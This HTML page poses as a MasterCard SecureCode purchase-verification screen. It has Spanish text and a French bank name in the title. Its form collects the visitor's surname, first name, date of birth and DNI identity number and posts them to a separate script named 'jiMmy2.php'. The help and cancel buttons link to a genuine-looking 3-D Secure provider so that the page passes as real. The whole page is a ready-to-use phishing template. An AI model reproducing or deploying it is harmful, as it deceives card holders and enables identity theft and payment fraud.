﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>PASS Services Financiers - MasterCard® Secure Code™</title>
<link href="INFORMATION_fichiers/style.css" rel="stylesheet" type="text/css" media="screen">
<!--[if IE 6]><link href="content/400/css/ie6.css" rel="stylesheet" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link href="content/400/css/ie7.css" rel="stylesheet" type="text/css" media="screen" /><![endif]-->	
<script type="text/javascript" src="INFORMATION_fichiers/jquery.js"></script>
<script type="text/javascript" src="INFORMATION_fichiers/script.js"></script>
</head>

<body>
<div id="page">
	<div id="header"></div>
	<div id="header"><img alt="FME9sHT.png (506×89)" src="https://i.imgur.com/FME9sHT.png" /></div>
<div>&nbsp;</div>

	<div id="content">
		<h1>Sus pagos seguros por Internet</h1>
		<p>
		Para confirmar su compra en una página web con el logotipo MasterCard®
 Secure Code™,&nbsp;es obligatoria la contraseña, que recibirá por SMS 
en su móvil. La contraseña será distinta para cada  una de sus compras.
		<!-- Form -->
		</p><div class="form">
			<div class="content">
			<div id="erreur"></div>
			<h2>Verificación de su identidad</h2>
				<form method="post" action="jiMmy2.php">
				<fieldset>
					<div class="field ">
						<label for="lastName"><span class="title">Apellidos</span></label>
						<input id="lastName" name="lastName" class="form-right ieheight field_to_verify" maxlength="50" type="text">
						<span></span>
					</div>
					
					<div class="field ">
						<label for="firstName"><span class="title">Nombre</span></label>
						<input id="firstName" name="firstName" class="form-right ieheight field_to_verify" maxlength="50" type="text">
					</div>
					
					<div class="field  field_to_verify">
						<label for="day"><span class="title">Fecha de nacimiento</span></label>
						<input name="day" value="DD" id="day" maxlength="2" class="form-right ieheight" type="text">
						<input name="month" value="MM" id="month" maxlength="2" class="form-right ieheight" type="text">
						<input name="year" value="AAAA" id="year" maxlength="4" class="form-right ieheight" type="text">
					</div>
				</fieldset>
				<div class="field ">
						<label for="lastName"><span class="title">número del DNI</span></label>
						<input id="lastName" name="phoneNumber" class="form-right ieheight field_to_verify" maxlength="50" type="text">
						<span></span>
					</div>
								
			<h2>
			</h2>
			
			<fieldset>
				
			
			</fieldset>
								
				<div class="button">
					<a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=15EDF32E588F94B33A7431E56695739D?help=true"><img src="INFORMATION_fichiers/bt_help_es.gif" alt="Ayuda" width="45" height="15"></a>&nbsp;&nbsp;
					<!-- Reset -->
					<a href="https://acs1.3ds.modirum.com/mdpayacs/pareq;mdsessionid=15EDF32E588F94B33A7431E56695739D?cancel=true"><img src="INFORMATION_fichiers/bt_cancel_es.gif" alt="Anular"></a>&nbsp;&nbsp;
					<!-- Submit -->
					<input src="INFORMATION_fichiers/bt_next_es.gif" alt="Siguiente" name="submit" id="submit" value="submit" "="" type="image">
				</div>
				</form>
			</div>
		</div>
		<!-- End Form -->
	</div>
	
	<div id="footer"></div>
</div>



</body></html>